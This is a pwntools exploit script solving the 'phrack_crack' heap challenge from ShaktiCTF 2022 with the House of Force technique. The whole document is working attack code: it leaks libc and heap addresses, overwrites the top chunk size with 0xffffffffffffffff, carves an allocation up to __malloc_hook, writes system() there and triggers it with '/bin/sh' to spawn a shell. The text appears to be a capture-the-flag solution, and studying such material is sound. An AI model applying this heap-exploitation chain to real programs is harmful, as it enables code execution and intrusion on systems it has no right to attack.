House of Force ShaktiCTF 2022

solve.py

from pwn import *
import binascii
context.terminal = ['alacritty', '-e', 'zsh', '-c']

# Heap: House of Force

# gdb hack
def _new_binary():
	return "gdb-gef"
gdb.binary = _new_binary

#p = remote('',13377, level='debug')
p = process("./phrack_crack", level="debug")
elf = context.binary = ELF("phrack_crack")
libc = ELF(elf.runpath + b"/libc.so.6") 


def malloc(size, data):
	p.recvuntil(b"> ")
	p.sendline(b"1")
	p.recvuntil(b"size:")
	p.sendline(f"{size}")
	p.recvuntil(b"data:")
	p.sendline(data)	


def edit(index, data):
	p.recvuntil(b"> ")
	p.sendline(b"2")
	p.recvuntil(b"index:")
	p.sendline(f"{index}")
	p.recvuntil(b"data:")
	p.send(data)	

# leak libc & heap
p.recvuntil(b"you! ")
libc_leak = p.readline().rstrip(b"\n")
libc_leak = int(libc_leak, 16) 
libc.address = libc_leak - libc.sym.puts
#log.info(f"Libc Base: {hex(libc.address)}")
p.recvuntil(b"you: ")
heap_leak = p.readline().rstrip(b"\n")
heap_leak = int(heap_leak, 16)
heap_base = heap_leak - 0x220
#log.info(f"Heap Base: {hex(heap_base)}")

gdb.attach(p, '''
set follow-fork-mode child
b *free
continue
''')

# override top chunk size with 0xffffffffffffffff to allow huge allocations
malloc(24, b"A"*24)
top_chunk_override = b"B"*(24) + p64(0xffffffffffffffff)
edit(0, top_chunk_override)

# allocate malloc hook
# it will not allocate at the target we give it, it will go from the base and allocate a big chunk that leads up to our malloc_hook
target = (libc.symbols['__malloc_hook'] - heap_base - 0x1330)
log.info(f"Heap base:                   {hex(heap_base)}")
log.info(f"Allocation size:             {hex(target)}")
log.info(f"Heap base + allocation size: {hex(target+heap_base)}")
log.info(f"__malloc_hook:               {hex(libc.symbols['__malloc_hook'])}")

malloc(target, b"")

# write system to malloc hook
malloc(8, p64(libc.symbols['system']))

# call malloc (will be system, so we can provide an arg)
malloc(next(libc.search(b'/bin/sh')),"")

p.interactive()